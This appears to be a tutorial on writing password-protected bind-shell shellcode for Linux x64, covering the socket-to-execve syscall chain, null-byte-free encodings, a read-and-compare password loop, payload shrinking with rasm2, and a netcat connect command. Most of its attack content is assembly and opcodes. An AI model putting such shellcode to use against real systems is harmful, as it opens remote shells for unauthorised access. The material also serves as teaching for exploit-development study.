Our goal is to write shellcode for the Linux x64 architecture that will open a TCP over IPv4 socket, wait for an incoming connection and execute a shell only after the client provides a valid password.
In order to write a regular bind shell, we need to chain several syscalls. The exact order is the following (we’ll take care of the authentication later):
- We create a new socket and bind it to the target address using the socket and bind syscalls.
- We make the socket stay open and wait for a connection using the listen syscall.
- Once an incoming connection is received, we use the accept syscall to establish the connection.
- We duplicate each standard stream (stdin, stdout and stderr) onto the client socket using the dup2 syscall, so the shell reads its input from, and writes its output to, the connected client.
- We fire a shell by using the execve syscall.
Each of these syscalls has a signature we need to satisfy: its arguments must be placed in specific registers. On Linux x64 the arguments go in rdi, rsi, rdx, r10, r8 and r9, in that order. The rax register identifies the syscall to execute, so it must always contain the syscall number. A whole document containing a full syscall table can be found here.
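As a quick reference, the syscalls used in this post can be collected in a small lookup table. The Python sketch below is only an illustration: the names SYSCALLS, ARG_REGISTERS and describe are made up for this example, while the numbers are the standard Linux x86-64 syscall numbers.

```python
# Linux x86-64 syscall numbers for the calls used in this post.
SYSCALLS = {
    "read": 0x00,
    "close": 0x03,
    "dup2": 0x21,
    "socket": 0x29,
    "accept": 0x2B,
    "bind": 0x31,
    "listen": 0x32,
    "execve": 0x3B,
}

# Registers that carry syscall arguments, in order.
ARG_REGISTERS = ("rdi", "rsi", "rdx", "r10", "r8", "r9")


def describe(name, *args):
    """Return the register assignments needed before the syscall instruction."""
    if len(args) > len(ARG_REGISTERS):
        raise ValueError("a syscall takes at most six arguments")
    lines = [f"rax = {hex(SYSCALLS[name])}"]
    for register, value in zip(ARG_REGISTERS, args):
        lines.append(f"{register} = {hex(value)}")
    return lines


# socket(AF_INET=2, SOCK_STREAM=1, protocol=0)
print("\n".join(describe("socket", 2, 1, 0)))
```

Printing the plan for socket gives the same four register values that the assembly in the next section loads by hand.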
Stage One: Writing a Syscall
Let’s see an example of how to execute a syscall:
A Simple Syscall: Socket (0x29)
    48c7c029000000    mov rax, 0x29    ; this is the socket syscall number
    48c7c702000000    mov rdi, 0x02    ; 0x02 corresponds to IPv4 (AF_INET)
    4831f6            xor rsi, rsi
    48ffc6            inc rsi          ; 0x01 corresponds to TCP (SOCK_STREAM)
    31d2              xor edx, edx     ; 0 selects the default protocol (sub-family)
    0f05              syscall          ; executes the syscall

Now, this code has some issues. First of all, it’s remarkably long (24 bytes, to be precise). Second, it contains a lot of null bytes. Let’s try to fix that!
A More Realistic Approach: Socket (0x29)
The following implementation is 12 bytes long (half the size of the previous example) and contains no null bytes:

    6a29    push 0x29
    58      pop rax      ; sets rax to 0x29 without null bytes
    6a02    push 0x02
    5f      pop rdi      ; same technique for rdi
    6a01    push 0x01
    5e      pop rsi      ; same for rsi
    99      cdq          ; sets rdx to 0 using just one byte (sign-extends eax, which is positive, into edx)
    0f05    syscall
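The size and null-byte figures for both listings can be checked mechanically from their hex encodings. The following Python sketch does that. The helper name measure and the two constant names are invented for this example, and the hex strings are copied from the listings above.

```python
def measure(hex_listing):
    """Return (size in bytes, number of null bytes) for a hex-encoded listing."""
    code = bytes.fromhex(hex_listing)  # fromhex skips the spaces between opcodes
    return len(code), code.count(0)


MOV_VERSION = "48c7c029000000 48c7c702000000 4831f6 48ffc6 31d2 0f05"
PUSH_POP_VERSION = "6a29 58 6a02 5f 6a01 5e 99 0f05"

for label, listing in (("mov version", MOV_VERSION),
                       ("push/pop version", PUSH_POP_VERSION)):
    size, nulls = measure(listing)
    print(f"{label}: {size} bytes, {nulls} null bytes")

# mov version: 24 bytes, 6 null bytes
# push/pop version: 12 bytes, 0 null bytes
```

The same check is handy later on, when individual instructions are swapped for shorter encodings.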
Stage Two: Writing a Bind Shell
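    section .text
    global _start

    _start:
        ; execve("/bin//sh", NULL, NULL)
        ; note: this listing uses 32-bit registers and int 0x80,
        ; so it must be assembled as 32-bit code
        xor ecx, ecx        ; ecx = 0 (argv = NULL)
        mul ecx             ; eax = 0 and edx = 0 (envp = NULL)
        push ecx            ; null terminator for the string
        push 0x68732f2f     ; "//sh", stored in little-endian byte order
        push 0x6e69622f     ; "/bin", stored in little-endian byte order
        mov ebx, esp        ; ebx points to "/bin//sh"
        mov al, 11          ; execve syscall number on 32-bit x86
        int 0x80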
Armed with all our knowledge we now need to chain every syscall together.
We can check the bind shell is working by assembling and linking the file, then extracting the shellcode and running it.
Once the shellcode is running, we connect from another terminal with netcat using the following command, and a shell should pop up:
nc 127.0.0.1 4444
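The port in that command has to match the one encoded in the address structure passed to bind. As a rough illustration, the Python sketch below builds the 16-byte sockaddr_in for port 4444. The listening address 0.0.0.0 is an assumption made for this example (the post does not state which address is bound), and the helper name sockaddr_in is made up here.

```python
import socket
import struct


def sockaddr_in(ip, port):
    """Pack an IPv4 socket address the way the bind syscall expects it."""
    return (
        struct.pack("<H", socket.AF_INET)  # sin_family, little-endian on x64
        + struct.pack(">H", port)          # sin_port, network (big-endian) order
        + socket.inet_aton(ip)             # sin_addr, 4 bytes
        + b"\x00" * 8                      # sin_zero padding
    )


addr = sockaddr_in("0.0.0.0", 4444)  # 0.0.0.0 is assumed, not taken from the post
print(len(addr), addr.hex())
# 16 0200115c000000000000000000000000
```

The structure is 0x10 bytes long and mostly zeros, which is why the values 0x00 and 0x10 need some care in shellcode that must stay free of null bytes.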
Stage Three: Adding Authentication
In order to add authentication, we need to read from the client file descriptor and compare the input against a password before executing the shell. The code should look roughly like this:
    ; 6 - Handle incoming connection
    ; 6.1 - Save client fd and close parent fd
    mov r9, rax                 ; store the client socket fd into r9
    ; closing the parent fd is not mandatory, may be commented out to save some space
    push syscalls.close
    pop rax                     ; close parent
    syscall

    ; 6.2 - Read password from the client fd
    read_pass:
    mov rax, r14                ; read syscall == 0x00
    mov rdi, r9                 ; from client fd
    push 4
    pop rdx                     ; rdx = input size
    sub rsp, rdx
    mov rsi, rsp                ; rsi => buffer
    syscall

    ; 6.3 - Check password
    mov rax, config.password
    mov rdi, rsi
    scasq                       ; compares the 8 bytes at [rdi] with rax (only 4 were read above, so the two sizes should be made to agree)
    jne read_pass
Basically, we read from the client file descriptor, then compare the input against a given password and repeat the process until it succeeds.
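The control flow of that loop is easier to see in a high-level language. The Python sketch below mirrors it under a few assumptions: the function name wait_for_password, the 4-byte password and the in-memory stream are all invented for illustration, and the early return on end of input is an addition so the example terminates (the assembly has no such exit).

```python
import io


def wait_for_password(stream, password, size=4):
    """Read size-byte chunks until one equals password.

    Returns the number of attempts, or None if the stream ends first.
    """
    attempts = 0
    while True:
        chunk = stream.read(size)   # counterpart of the read syscall
        if not chunk:               # end of input: not handled by the assembly
            return None
        attempts += 1
        if chunk == password:       # counterpart of the scas/jne pair
            return attempts


# Two wrong guesses followed by the right one.
client = io.BytesIO(b"aaaabbbbs3cr")
print(wait_for_password(client, b"s3cr"))  # 3
```

Note that the input is compared in fixed-size chunks, so a client that sends a trailing newline or a shorter guess shifts the alignment of every later attempt.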
Stage Four: Reducing the Payload
While working on the initial implementation, we avoided null bytes but did not care much about size. At this point the payload is around 180 bytes. To remove null bytes and reduce instruction size, we can use the rasm2 utility from radare2 to compare the encodings of candidate instructions.
Here’s a simple case:
    rasm2 -a x86 -b 64 "mov rax,29"
    48c7c01d000000
    rasm2 -a x86 -b 64 "mov al,29"
    b01d
We wrote some of the constants directly into the code to look for arithmetic instructions that could produce them instead. We also used xchg instead of mov reg, reg when conditions allowed it.
We also used some x64 registers as constant holders for values that were used repeatedly or were problematic (like 0x00 and 0x10), so we could load those values without having to push them on the stack or perform an arithmetic instruction first, thus saving some bytes.
Another trick was to use smaller register sizes when the situation allowed it (like r14d, r14w or r14b instead of the whole r14).
The final version should be around 163 bytes long.